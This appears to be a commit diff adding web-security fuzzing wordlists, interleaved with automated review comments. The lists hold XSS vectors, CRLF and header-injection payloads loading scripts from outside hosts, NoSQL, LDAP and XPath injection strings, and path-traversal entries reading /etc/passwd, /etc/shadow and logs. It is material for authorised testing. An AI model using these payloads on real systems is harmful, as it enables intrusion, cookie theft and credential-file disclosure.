<div id="div1"><input value="``onmouseover=alert(1)"></div> <div id="div2"></div><script>document.getElementById("div2").innerHTML = document.getElementById("div1").innerHTML;</script>
|
||||
<div style="[a]color[b]:[c]red">XXX</div>
|
||||
<div style="\63	\06f
\0006c\00006F
\R:\000072 Ed;color\0\bla:yellow\0\bla;col\0\00 \ or:blue;">XXX</div>
|
||||
<!-- IE 6-8 --><x '="foo"><x foo='><img src=x onerror=alert(1)//'><!-- IE 6-9 --><! '="foo"><x foo='><img src=x onerror=alert(2)//'><? '="foo"><x foo='><img src=x onerror=alert(3)//'>
|
||||
<embed src="javascript:alert(1)"></embed> // O10.10↓, OM10.0↓, GC6↓, FF<img src="javascript:alert(2)"><image src="javascript:alert(2)"> // IE6, O10.10↓, OM10.0↓<script src="javascript:alert(3)"></script> // IE6, O11.01↓, OM10.1↓
|
||||
<!DOCTYPE x[<!ENTITY x SYSTEM "http://html5sec.org/test.xxe">]><y>&x;</y>
|
||||
<svg onload="javascript:alert(1)" xmlns="http://www.w3.org/2000/svg"></svg>
|
||||
<?xml version="1.0"?><?xml-stylesheet type="text/xsl" href="data:,%3Cxsl:transform version='1.0' xmlns:xsl='http://www.w3.org/1999/XSL/Transform' id='xss'%3E%3Cxsl:output method='html'/%3E%3Cxsl:template match='/'%3E%3Cscript%3Ealert(1)%3C/script%3E%3C/xsl:template%3E%3C/xsl:transform%3E"?><root/>
|
||||
<!DOCTYPE x [ <!ATTLIST img xmlns CDATA "http://www.w3.org/1999/xhtml" src CDATA "xx:x" onerror CDATA "alert(1)" onload CDATA "alert(2)">]><img />
|
||||
<doc xmlns:xlink="http://www.w3.org/1999/xlink" xmlns:html="http://www.w3.org/1999/xhtml"> <html:style /><x xlink:href="javascript:alert(1)" xlink:type="simple">XXX</x></doc>
|
||||
<card xmlns="http://www.wapforum.org/2001/wml"><onevent type="ontimer"><go href="javascript:alert(1)"/></onevent><timer value="1"/></card>
|
||||
<div style=width:1px;filter:glow onfilterchange=alert(1)>x</div>
|
||||
<// style=x:expression\28write(1)\29>
|
||||
<form><button formaction="javascript:alert(1)">X</button>
|
||||
<event-source src="event.php" onload="alert(1)">
|
||||
<a href="javascript:alert(1)"><event-source src="data:application/x-dom-event-stream,Event:click%0Adata:XXX%0A%0A" /></a>
|
||||
<script<{alert(1)}/></script </>
|
||||
<?xml-stylesheet type="text/css"?><!DOCTYPE x SYSTEM "test.dtd"><x>&x;</x>
|
||||
<?xml-stylesheet type="text/css"?><root style="x:expression(write(1))"/>
|
||||
<?xml-stylesheet type="text/xsl" href="#"?><img xmlns="x-schema:test.xdr"/>
|
||||
<object allowscriptaccess="always" data="test.swf"></object>
|
||||
<style>*{x:expression(write(1))}</style>
|
||||
<x xmlns:xlink="http://www.w3.org/1999/xlink" xlink:actuate="onLoad" xlink:href="javascript:alert(1)" xlink:type="simple"/>
|
||||
<?xml-stylesheet type="text/css" href="data:,*%7bx:expression(write(2));%7d"?>
|
||||
<x:template xmlns:x="http://www.wapforum.org/2001/wml" x:ontimer="$(x:unesc)j$(y:escape)a$(z:noecs)v$(x)a$(y)s$(z)cript$x:alert(1)"><x:timer value="1"/></x:template>
|
||||
<x xmlns:ev="http://www.w3.org/2001/xml-events" ev:event="load" ev:handler="javascript:alert(1)//#x"/>
|
||||
<x xmlns:ev="http://www.w3.org/2001/xml-events" ev:event="load" ev:handler="test.evt#x"/>
|
||||
<body oninput=alert(1)><input autofocus>
|
||||
<svg xmlns="http://www.w3.org/2000/svg"><a xmlns:xlink="http://www.w3.org/1999/xlink" xlink:href="javascript:alert(1)"><rect width="1000" height="1000" fill="white"/></a></svg>
|
||||
<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink"><animation xlink:href="javascript:alert(1)"/><animation xlink:href="data:text/xml,%3Csvg xmlns='http://www.w3.org/2000/svg' onload='alert(1)'%3E%3C/svg%3E"/><image xlink:href="data:image/svg+xml,%3Csvg xmlns='http://www.w3.org/2000/svg' onload='alert(1)'%3E%3C/svg%3E"/><foreignObject xlink:href="javascript:alert(1)"/><foreignObject xlink:href="data:text/xml,%3Cscript xmlns='http://www.w3.org/1999/xhtml'%3Ealert(1)%3C/script%3E"/></svg>
|
||||
<svg xmlns="http://www.w3.org/2000/svg"><set attributeName="onmouseover" to="alert(1)"/><animate attributeName="onunload" to="alert(1)"/></svg>
|
||||
<!-- Up to Opera 10.63 --><div style=content:url(test2.svg)></div><!-- Up to Opera 11.64 - see link below --><!-- Up to Opera 12.x --><div style="background:url(test5.svg)">PRESS ENTER</div>
|
||||
[A]<? foo="><script>alert(1)</script>"><! foo="><script>alert(1)</script>"></ foo="><script>alert(1)</script>">[B]<? foo="><x foo='?><script>alert(1)</script>'>">[C]<! foo="[[[x]]"><x foo="]foo><script>alert(1)</script>">[D]<% foo><x foo="%><script>alert(1)</script>">
|
||||
<div style="background:url(http://foo.f/f oo/;color:red/*/foo.jpg);">X</div>
|
||||
<div style="list-style:url(http://foo.f)\20url(javascript:alert(1));">X</div>
|
||||
<svg xmlns="http://www.w3.org/2000/svg"><handler xmlns:ev="http://www.w3.org/2001/xml-events" ev:event="load">alert(1)</handler></svg>
|
||||
<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink"><feImage><set attributeName="xlink:href" to="data:image/svg+xml;charset=utf-8;base64,PHN2ZyB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciPjxzY3JpcHQ%2BYWxlcnQoMSk8L3NjcmlwdD48L3N2Zz4NCg%3D%3D"/></feImage></svg>
|
||||
<iframe src=mhtml:http://html5sec.org/test.html!xss.html></iframe><iframe src=mhtml:http://html5sec.org/test.gif!xss.html></iframe>
|
||||
<!-- IE 5-9 --><div id=d><x xmlns="><iframe onload=alert(1)"></div><script>d.innerHTML+='';</script><!-- IE 10 in IE5-9 Standards mode --><div id=d><x xmlns='"><iframe onload=alert(2)//'></div><script>d.innerHTML+='';</script>
|
||||
<div id=d><div style="font-family:'sans\27\2F\2A\22\2A\2F\3B color\3Ared\3B'">X</div></div><script>with(document.getElementById("d"))innerHTML=innerHTML</script>
|
||||
XXX<style>*{color:gre/**/en !/**/important} /* IE 6-9 Standards mode */<!----><!--*{color:red} /* all UA */*{background:url(xx:x //**/\red/*)} /* IE 6-7 Standards mode */</style>
|
||||
<img[a][b]src=x[d]onerror[c]=[e]"alert(1)">
|
||||
<a href="[a]java[b]script[c]:alert(1)">XXX</a>
|
||||
<img src="x` `<script>alert(1)</script>"` `>
|
||||
<script>history.pushState(0,0,'/i/am/somewhere_else');</script>
|
||||
<svg xmlns="http://www.w3.org/2000/svg" id="foo"><x xmlns="http://www.w3.org/2001/xml-events" event="load" observer="foo" handler="data:image/svg+xml,%3Csvg%20xmlns%3D%22http%3A%2F%2Fwww.w3.org%2F2000%2Fsvg%22%3E%0A%3Chandler%20xml%3Aid%3D%22bar%22%20type%3D%22application%2Fecmascript%22%3E alert(1) %3C%2Fhandler%3E%0A%3C%2Fsvg%3E%0A#bar"/></svg>
|
||||
<iframe src="data:image/svg-xml,%1F%8B%08%00%00%00%00%00%02%03%B3)N.%CA%2C(Q%A8%C8%CD%C9%2B%B6U%CA())%B0%D2%D7%2F%2F%2F%D7%2B7%D6%CB%2FJ%D77%B4%B4%B4%D4%AF%C8(%C9%CDQ%B2K%CCI-*%D10%D4%B4%D1%87%E8%B2%03"></iframe>
|
||||
<img src onerror /" '"= alt=alert(1)//">
|
||||
<title onpropertychange=alert(1)></title><title title=></title>
|
||||
<!-- IE 5-8 standards mode --><a href=http://foo.bar/#x=`y></a><img alt="`><img src=xx:x onerror=alert(1)></a>"><!-- IE 5-9 standards mode --><!a foo=x=`y><img alt="`><img src=xx:x onerror=alert(2)//"><?a foo=x=`y><img alt="`><img src=xx:x onerror=alert(3)//">
|
||||
<svg xmlns="http://www.w3.org/2000/svg"><a id="x"><rect fill="white" width="1000" height="1000"/></a><rect fill="white" style="clip-path:url(test3.svg#a);fill:url(#b);filter:url(#c);marker:url(#d);mask:url(#e);stroke:url(#f);"/></svg>
|
||||
<svg xmlns="http://www.w3.org/2000/svg"><path d="M0,0" style="marker-start:url(test4.svg#a)"/></svg>
|
||||
<div style="background:url(/f#[a]oo/;color:red/*/foo.jpg);">X</div>
|
||||
<div style="font-family:foo{bar;background:url(http://foo.f/oo};color:red/*/foo.jpg);">X</div>
|
||||
<div id="x">XXX</div><style>#x{font-family:foo[bar;color:green;}#y];color:red;{}</style>
|
||||
<x style="background:url('x[a];color:red;/*')">XXX</x>
|
||||
<!--[if]><script>alert(1)</script --><!--[if<img src=x onerror=alert(2)//]> -->
|
||||
<div id="x">x</div><xml:namespace prefix="t"><import namespace="t" implementation="#default#time2"><t:set attributeName="innerHTML" targetElement="x" to="<imgsrc=x:xonerror=alert(1)>">
|
||||
<a href="http://attacker.org"> <iframe src="http://example.org/"></iframe></a>
|
||||
<div draggable="true" ondragstart="event.dataTransfer.setData('text/plain','malicious code');"> <h1>Drop me</h1></div><iframe src="http://www.example.org/dropHere.html"></iframe>
|
||||
<iframe src="view-source:http://www.example.org/" frameborder="0" style="width:400px;height:180px"></iframe><textarea type="text" cols="50" rows="10"></textarea>
|
||||
<script>function makePopups(){ for (i=1;i<6;i++) { window.open('popup.html','spam'+i,'width=50,height=50'); }}</script><body><a href="#" onclick="makePopups()">Spam</a>
|
||||
<html xmlns="http://www.w3.org/1999/xhtml"xmlns:svg="http://www.w3.org/2000/svg"><body style="background:gray"><iframe src="http://example.com/" style="width:800px; height:350px; border:none; mask: url(#maskForClickjacking);"/><svg:svg><svg:mask id="maskForClickjacking" maskUnits="objectBoundingBox" maskContentUnits="objectBoundingBox"> <svg:rect x="0.0" y="0.0" width="0.373" height="0.3" fill="white"/> <svg:circle cx="0.45" cy="0.7" r="0.075" fill="white"/></svg:mask></svg:svg></body></html>
|
||||
<iframe sandbox="allow-same-origin allow-forms allow-scripts" src="http://example.org/"></iframe>
|
||||
<span class=foo>Some text</span><a class=bar href="http://www.example.org">www.example.org</a><script src="http://code.jquery.com/jquery-1.4.4.js"></script><script>$("span.foo").click(function() {alert('foo');$("a.bar").click();});$("a.bar").click(function() {alert('bar');location="http://html5sec.org";});</script>
|
||||
<script src="/\example.com\foo.js"></script> // Safari 5.0, Chrome 9, 10<script src="\\example.com\foo.js"></script> // Safari 5.0
|
||||
<?xml version="1.0"?><?xml-stylesheet type="text/xml" href="#stylesheet"?><!DOCTYPE doc [<!ATTLIST xsl:stylesheet id ID #REQUIRED>]><svg xmlns="http://www.w3.org/2000/svg"> <xsl:stylesheet id="stylesheet" version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform"> <xsl:template match="/"> <iframe xmlns="http://www.w3.org/1999/xhtml" src="javascript:alert(1)"></iframe> </xsl:template> </xsl:stylesheet> <circle fill="red" r="40"></circle></svg>
|
||||
<object id="x" classid="clsid:CB927D12-4FF7-4a9e-A169-56E4B8A75598"></object><object classid="clsid:02BF25D5-8C17-4B23-BC80-D3488ABDDC6B" onqt_error="alert(1)" style="behavior:url(#x);"><param name=postdomevents /></object>
|
||||
<svg xmlns="http://www.w3.org/2000/svg" id="x"><listener event="load" handler="#y" xmlns="http://www.w3.org/2001/xml-events" observer="x"/><handler id="y">alert(1)</handler></svg>
|
||||
<svg><style><img/src=x onerror=alert(1)// </b>
|
||||
<svg><image style='filter:url("data:image/svg+xml,<svg xmlns=%22http://www.w3.org/2000/svg%22><script>parent.alert(1)</script></svg>")'><!--Same effect with<image filter='...'>--></svg>
|
||||
<math href="javascript:alert(1)">CLICKME</math><math><!-- up to FF 13 --><maction actiontype="statusline#http://google.com" xlink:href="javascript:alert(2)">CLICKME</maction><!-- FF 14+ --><maction actiontype="statusline" xlink:href="javascript:alert(3)">CLICKME<mtext>http://http://google.com</mtext></maction></math>
|
||||
<b>drag and drop one of the following strings to the drop box:</b><br/><hr/>jAvascript:alert('Top Page Location: '+document.location+' Host Page Cookies: '+document.cookie);//<br/><hr/>feed:javascript:alert('Top Page Location: '+document.location+' Host Page Cookies: '+document.cookie);//<br/><hr/>feed:data:text/html,<script>alert('Top Page Location: '+document.location+' Host Page Cookies: '+document.cookie)</script><b><br/><hr/>feed:feed:javAscript:javAscript:feed:alert('Top Page Location: '+document.location+' Host Page Cookies: '+document.cookie);//<br/><hr/><div id="dropbox" style="height: 360px;width: 500px;border: 5px solid #000;position: relative;" ondragover="event.preventDefault()">+ Drop Box +</div>
|
||||
<!doctype html><form><label>type a,b,c,d - watch the network tab/traffic (JS is off, latest NoScript)</label><br><input name="secret" type="password"></form><!-- injection --><svg height="50px"><image xmlns:xlink="http://www.w3.org/1999/xlink"><set attributeName="xlink:href" begin="accessKey(a)" to="//example.com/?a" /><set attributeName="xlink:href" begin="accessKey(b)" to="//example.com/?b" /><set attributeName="xlink:href" begin="accessKey(c)" to="//example.com/?c" /><set attributeName="xlink:href" begin="accessKey(d)" to="//example.com/?d" /></image></svg>
|
||||
<!-- `<img/src=xx:xx onerror=alert(1)//--!>
|
||||
<xmp><%</xmp><img alt='%></xmp><img src=xx:x onerror=alert(1)//'><script>x='<%'</script> %>/alert(2)</script>XXX<style>*['<!--']{}</style>-->{}*{color:red}</style>
|
||||
<?xml-stylesheet type="text/xsl" href="#" ?><stylesheet xmlns="http://www.w3.org/TR/WD-xsl"><template match="/"><eval>new ActiveXObject('htmlfile').parentWindow.alert(1)</eval><if expr="new ActiveXObject('htmlfile').parentWindow.alert(2)"></if></template></stylesheet>
|
||||
<form action="" method="post"><input name="username" value="admin" /><input name="password" type="password" value="secret" /><input name="injected" value="injected" dirname="password" /><input type="submit"></form>
|
||||
<svg><a xmlns:xlink="http://www.w3.org/1999/xlink" xlink:href="?"><circle r="400"></circle><animate attributeName="xlink:href" begin="0" from="javascript:alert(1)" to="&" /></a>
|
||||
<isindex type=image src=1 onerror=alert(1)>
|
||||
<isindex action=javascript:alert(1) type=image>
|
||||
<object data="javascript:alert(0)">
|
||||
<img src=x:alert(alt) onerror=eval(src) alt=0>
|
||||
<x:script xmlns:x="http://www.w3.org/1999/xhtml">alert('xss');</x:script>
|
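Review bot: Several entries in HTML5sec_Injections.txt point at live third-party hosts (`http://html5sec.org/…`, `http://code.jquery.com/jquery-1.4.4.js`, `http://google.com`, `http://attacker.org`). Rendering them during a test makes the browser under test fetch from servers outside the engagement scope, and it may disclose the tested URL to them. The upload lists in this commit already use placeholders such as `{EXT}`; a host placeholder (say `{TESTHOST}`, a name constructed here) or the reserved `example.org` would keep that traffic inside the lab. Separately, the entry starting `<div style="\63` appears to span three lines, which a one-payload-per-line consumer would split into fragments; this should be checked against the upstream file.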
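--- a/attack/html_js_fuzz/html_tags.txt
+++ b/attack/html_js_fuzz/html_tags.txt
@@ -0,0 +1,115 @@
+<!-- -->
+<!DOCTYPE>
+<a>
+<abbr>
+<acronym>
+<address>
+<applet>
+<area>
+<article>
+<aside>
+<audio>
+<b>
+<base>
+<basefont>
+<bdo>
+<big>
+<blockquote>
+<body>
+<br>
+<button>
+<canvas>
+<caption>
+<center>
+<cite>
+<code>
+<col>
+<colgroup>
+<command>
+<datalist>
+<dd>
+<del>
+<details>
+<dfn>
+<dir>
+<div>
+<dl>
+<dt>
+<em>
+<embed>
+<fieldset>
+<figcaption>
+<figure>
+<font>
+<footer>
+<form>
+<frame>
+<frameset>
+<h1>
+<head>
+<header>
+<hgroup>
+<hr>
+<html>
+<i>
+<iframe>
+<img>
+<input>
+<ins>
+<keygen>
+<kbd>
+<label>
+<legend>
+<li>
+<link>
+<map>
+<mark>
+<menu>
+<meta>
+<meter>
+<nav>
+<noframes>
+<noscript>
+<object>
+<ol>
+<optgroup>
+<option>
+<output>
+<p>
+<param>
+<pre>
+<progress>
+<q>
+<rp>
+<rt>
+<ruby>
+<s>
+<samp>
+<script>
+<section>
+<select>
+<small>
+<source>
+<span>
+<strike>
+<strong>
+<style>
+<sub>
+<summary>
+<sup>
+<table>
+<tbody>
+<td>
+<textarea>
+<tfoot>
+<th>
+<thead>
+<time>
+<title>
+<tr>
+<tt>
+<u>
+<ul>
+<var>
+<video>
+<xmp>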
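--- a/attack/html_js_fuzz/javascript_events.txt
+++ b/attack/html_js_fuzz/javascript_events.txt
@@ -0,0 +1,74 @@
+onafterprint
+onbeforeprint
+onbeforeonload
+onblur
+onerror
+onfocus
+onhaschange
+onload
+onmessage
+onoffline
+ononline
+onpagehide
+onpageshow
+onpopstate
+onredo
+onresize
+onstorage
+onundo
+onunload
+onblur
+onchange
+oncontextmenu
+onfocus
+onformchange
+onforminput
+oninput
+oninvalid
+onreset
+onselect
+onsubmit
+onkeydown
+onkeypress
+onkeyup
+onclick
+ondblclick
+ondrag
+ondragend
+ondragenter
+ondragleave
+ondragover
+ondragstart
+ondrop
+onmousedown
+onmousemove
+onmouseout
+onmouseover
+onmouseup
+onmousewheel
+onscroll
+onabort
+oncanplay
+oncanplaythrough
+ondurationchange
+onemptied
+onended
+onerror
+onloadeddata
+onloadedmetadata
+onloadedstart
+onpause
+onplay
+onplaying
+onprogress
+onratechange
+onreadystatechange
+onseeked
+onseeking
+onstalled
+onsuspend
+ontimeupdate
+onvolumechange
+onwaiting
+style
+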
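Review bot: Two entries are not spelled like the handler attributes they appear to stand for, so a sanitizer or filter regression run driven by this list never exercises the real names: `onhaschange` (presumably `onhashchange`) and `onloadedstart` (presumably `onloadstart`). `onblur`, `onfocus` and `onerror` each appear twice, which only produces duplicate test cases. The last entry, `style`, is an attribute rather than an event, and the hunk count of 74 against 73 visible names implies a trailing empty line that a line-by-line consumer will submit as an empty value. If both are intentional, the directory's README is the place to say so.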
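--- a/attack/html_js_fuzz/js_inject.txt
+++ b/attack/html_js_fuzz/js_inject.txt
@@ -0,0 +1,10 @@
+function(){ return this.userid}
+' function(){ return this.username} or '1'='1
+function(){return version()}
+function(){return version}
+t'; return this; var d='!
+" function(){ return this} or '1'='1
+t"; return this; var d='!
+' || this || '1'=='1
+' || this.version || '1'=='1
+' || '1'=='1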
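--- a/attack/http-protocol/crlf-injection.txt
+++ b/attack/http-protocol/crlf-injection.txt
@@ -0,0 +1,20 @@
+%0d%0a
+%0d%0a%0d%0a
+r%0d%0aContentLength:%200%0d%0a%0d%0aHTTP/1.1%20200%20OK%0d%0aContentType:%20text/html%0d%0aContentLength:%2019%0d%0a%0d%0a<html>Injected%02Content</html>
+%0d%0d%0a%0a
+0x0D0x0A
+0x0D0x0D0x0A0x0A
+\r\n
+%5cr%5cn
+%0%0d%0ad%0%0d%0aa
+%0%0D%0AD%0%0D%0AA
+%0d%0aContentType:%20text/html;charset=UTF-7%0d%0aContent-Length:%20129%0d%0a%0d%0a%2BADw-html%2BAD4-%2BADw-body%2BAD4-%2BADw-script%2BAD4-alert%28%27XSS,cookies:%27%2Bdocument.cookie%29%2BADw-/script%2BAD4-%2BADw-/body%2BAD4-%2BADw-/html%2BAD4
+%0AContent-Type:html%0A%0A%3Cscript%3Ealert(%22XSS%22)%3C/script%3E
+%0A%0A%3Cscript%3Ealert(%22XSS%22)%3C/script%3E
+%0AContent-Type:html%0A%0A%3Cscript%3Ealert(%22XSS%22)%3C/script%3Ehttp://www.test.com
+%0d%0a%0d%0a%3Chtml%3E%3Cbody%3E%3C%2Fbody%3E%3Cscript+src%3Dhttp%3A%2F%2Fha.ckers.org%2Fs.js%3E%3C%2Fscript%3E%3Cscript%3Ealert(%22location.host%20is:%20%22%2Blocation.host)%3C%2Fscript%3E%3C%2Fhtml%3E
+%0d%0a%0d%0a%3Cscript+src%3Dhttp%3A%2F%2Fha.ckers.org%2Fxss.js%3E%3C%2Fscript%3E
+%22%3E%0A%0A%3Cscript%3Ealert(%22XSS%22)%3C/script%3E%3C%22
+%0AContent-type:%20text/html%0A%0Ahttp://www.test.com/%3Cscript%3Ealert(%22XSS%22)%3C/script%3E
+%0d%0a%0d%0a%3Cscript%3Ealert(%22XSS%22)%3C%2Fscript%3E
+%0A%0A%3Cscript%3Ealert(%22XSS%22)%3C/script%3E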
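Review bot: Entries 15 and 16 reference a script on `ha.ckers.org`, a third-party host that whoever runs the test does not control. If such an entry is ever reflected by the application under test, a browser would fetch whatever that host serves at the time, into the tested origin. A reserved placeholder host such as `example.com`, or a token that tooling replaces with a tester-owned host, keeps the test case without the external dependency. Separately, entry 20 is byte-identical to entry 13 (`%0A%0A%3Cscript%3Ealert(%22XSS%22)%3C/script%3E`) and can be dropped.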
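--- a/attack/http-protocol/hpp.txt
+++ b/attack/http-protocol/hpp.txt
@@ -0,0 +1,38 @@
+# HTTP paramter polution and interpretation payloads by Jacco van Tuijl
+?id=id=1
+&id=1?id=2
+?id['&id=1']=2
+?id[1&id=2]=1
+?id=1&id=2
+&id=1&id=2
+?id=1%26id%3D2
+?id&id=1
+????id=1
+&&&&id=1
+?id=id['1']=2
+?id=1#id=2
+?id==1
+?id===1
+;id=1?id=2
+?id;id=1
+&id=1;id=2
+#id=1?id=2&id=3
+?id=1,2
+?id1,id2=1
+?id[=1&id=2]=3
+?id[&id=2]=1
+?id=[1,2]
+?id&=1
+?id[]=1&id=2
+?id=/:@&=+$&id=2
+?id[=/:@&=+$&id=2]=1
+?id={id:{id:1},2}
+?id[{id:{id[]:1},2}]=3
+?id=%23?id=1
+?id=1%26id=2
+?id=1%2526id=2
+?id=1%c0%a6id=2
+?id=1\uc0a6id=2
+?id=1&id=2
+?id=1&id=2
+?id=1%u0026;id=2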
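Review bot: The first line is a comment in a file that tools read one entry per line, so any consumer that does not strip `#` lines will send the attribution itself as a test case. The credit is better placed in the directory's README; if it stays here, it should at least be spelled `# HTTP parameter pollution and interpretation payloads by Jacco van Tuijl`. Entries 36 and 37 both render on this page as `?id=1&id=2`, identical to entry 6. If the raw file holds entity-encoded forms of `&` on those lines, the page rendering has decoded them and the raw file should be checked; otherwise two of the three are redundant.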
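--- a/attack/http-protocol/known-uri-types.txt
+++ b/attack/http-protocol/known-uri-types.txt
@@ -0,0 +1,148 @@
+aaa:
+aaas:
+about:
+acap:
+adiumxtra:
+afp:
+aim:
+apt:
+aw:
+beshare:
+bitcoin:
+bolo:
+callto:
+cap:
+chrome:
+cid:
+coap:
+content:
+crid:
+cvs:
+data:
+dav:
+dict:
+dns:
+doi:
+ed2k:
+facetime:
+fax:
+feed:
+file:
+finger:
+fish:
+ftp:
+geo:
+gg:
+git:
+gizmoproject:
+go:
+gopher:
+gtalk:
+h323:
+http:
+https:
+iax:
+icap:
+im:
+imap:
+info:
+ipp:
+irc:
+irc6:
+ircs:
+iris.beep:
+iris.lws:
+iris.xpcs:
+iris.xpc:
+iris:
+itms:
+jar:
+javascript:
+keyparc:
+lastfm:
+ldap:
+ldaps:
+lsid:
+magnet:
+mailto:
+maps:
+market:
+message:
+mid:
+mms:
+modem:
+msnim:
+msrps:
+msrp:
+mtqp:
+mumble:
+mupdate:
+mvn:
+news:
+nfs:
+nntp:
+notes:
+opaquelocktoken:
+palm:
+paparazzi:
+platform:
+pop:
+pres:
+prospero:
+proxy:
+psyc:
+query:
+rmi:
+rsync:
+rtmp:
+rtsp:
+secondlife:
+service:
+sftp:
+sgn:
+shttp:
+sieve:
+sip:
+sips:
+skype:
+smb:
+sms:
+snmp:
+soap.beeps:
+soap.beep:
+soldat:
+spotify:
+ssh:
+steam:
+svn:
+tag:
+teamspeak:
+tel:
+telnet:
+tftp:
+things:
+thismessage:
+tip:
+tv:
+udp:
+unreal:
+urn:
+ut2004:
+uuid:
+vemmi:
+ventrilo:
+view-source:
+wais:
+webcal:
+wss:
+ws:
+wtai:
+wyciwyg:
+xfire:
+xmlrpc.beeps:
+xmlrpc.beep :
+xmpp:
+xri:
+ymsgr:
+z39.50r:
+z39.50s: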
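Review bot: The entry `xmlrpc.beep :` has a space before the colon, unlike every other line, so it does not name the `xmlrpc.beep` scheme and a URL-scheme allowlist test fed from this file never exercises it; it should read `xmlrpc.beep:`. The list is alphabetical except for the `iris.*` group and the `msrps`/`msrp`, `soap.beeps`/`soap.beep` and `wss`/`ws` pairs. That is harmless for consumers but makes later additions harder to review.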
89
attack/json/JSON_Fuzzing.txt
Normal file
89
attack/json/JSON_Fuzzing.txt
Normal file
File diff suppressed because one or more lines are too long
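--- a/attack/ldap/ldap-injection.txt
+++ b/attack/ldap/ldap-injection.txt
@@ -0,0 +1,28 @@
+!
+%21
+%26
+%28
+%29
+%2A%28%7C%28mail%3D%2A%29%29
+%2A%28%7C%28objectclass%3D%2A%29%29
+%2A%7C
+%7C
+&
+(
+)
+*()|%26'
+*()|&'
+*(|(mail=*))
+*(|(objectclass=*))
+*)(uid=*))(|(uid=*
+*/*
+*|
+/
+//
+//*
+@*
+|
+admin*
+admin*)((|userpassword=*)
+admin*)((|userPassword=*)
+x' or name()='username' or 'x'='y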
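Review bot: The last entry, `x' or name()='username' or 'x'='y`, is XPath syntax rather than an LDAP filter fragment (`name()` is an XPath function, and LDAP filters have no quoted `or`). A finding triggered by it would be filed under the wrong injection class, so it belongs in the repository's XPath list, if one exists (none is visible on this part of the page). Entries 26 and 27 differ only in the case of `userpassword`/`userPassword`. LDAP attribute names are matched case-insensitively by directory servers, so the pair is presumably there to probe application-side filtering; a README note saying so would stop it being deduplicated later.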
867
attack/lfi/JHADDIX_LFI.txt
Normal file
867
attack/lfi/JHADDIX_LFI.txt
Normal file
|
@ -0,0 +1,867 @@
|
|||
/.../.../.../.../.../
|
||||
\…..\\\…..\\\…..\\\
|
||||
%00../../../../../../etc/passwd
|
||||
%00/etc/passwd%00
|
||||
%00../../../../../../etc/shadow
|
||||
%00/etc/shadow%00
|
||||
%0a/bin/cat%20/etc/passwd
|
||||
%0a/bin/cat%20/etc/shadow
|
||||
/%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%00
|
||||
%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..% 25%5c..%25%5c..%00
|
||||
%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%00
|
||||
%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..% 25%5c..%25%5c..%255cboot.ini
|
||||
/%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..winnt/desktop.ini
|
||||
/../../../../../../../../%2A
|
||||
/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/boot.ini
|
||||
/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd
|
||||
/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/shadow
|
||||
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd
|
||||
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fshadow
|
||||
..%2F..%2F..%2F%2F..%2F..%2F%2Fvar%2Fnamed
|
||||
..%2F..%2F..%2F%2F..%2F..%2Fetc/passwd
|
||||
..%2F..%2F..%2F%2F..%2F..%2Fetc/shadow
|
||||
=3D “/..” . “%2f..
|
||||
..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c/boot.ini
|
||||
admin/access_log
|
||||
/admin/install.php
|
||||
../../../administrator/inbox
|
||||
/apache2/logs/access_log
|
||||
/apache2/logs/access.log
|
||||
/apache2/logs/error_log
|
||||
/apache2/logs/error.log
|
||||
/apache/logs/access_log
|
||||
/apache/logs/access.log
|
||||
../../../../../apache/logs/access.log
|
||||
../../../../apache/logs/access.log
|
||||
../../../apache/logs/access.log
|
||||
../../apache/logs/access.log
|
||||
../apache/logs/access.log
|
||||
/apache/logs/error_log
|
||||
/apache/logs/error.log
|
||||
../../../../../apache/logs/error.log
|
||||
../../../../apache/logs/error.log
|
||||
../../../apache/logs/error.log
|
||||
../../apache/logs/error.log
|
||||
../apache/logs/error.log
|
||||
/apache\php\php.ini
|
||||
\\'/bin/cat%20/etc/passwd\\'
|
||||
\\'/bin/cat%20/etc/shadow\\'
|
||||
/.bash_history
|
||||
/.bash_profile
|
||||
/.bashrc
|
||||
/../../../../../../../../bin/id|
|
||||
/bin/php.ini
|
||||
/boot/grub/grub.conf
|
||||
/./././././././././././boot.ini
|
||||
/../../../../../../../../../../../boot.ini
|
||||
/..\../..\../..\../..\../..\../..\../boot.ini
|
||||
/.\\./.\\./.\\./.\\./.\\./.\\./boot.ini
|
||||
..//..//..//..//..//boot.ini
|
||||
../../../../../../../../../../../../boot.ini
|
||||
../../boot.ini
|
||||
..\../..\../..\../..\../boot.ini
|
||||
..\../..\../boot.ini
|
||||
..\..\..\..\..\..\..\..\..\..\boot.ini
|
||||
\..\..\..\..\..\..\..\..\..\..\boot.ini
|
||||
/../../../../../../../../../../../boot.ini%00
|
||||
../../../../../../../../../../../../boot.ini%00
|
||||
..\..\..\..\..\..\..\..\..\..\boot.ini%00
|
||||
/../../../../../../../../../../../boot.ini%00.html
|
||||
/../../../../../../../../../../../boot.ini%00.jpg
|
||||
/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd
|
||||
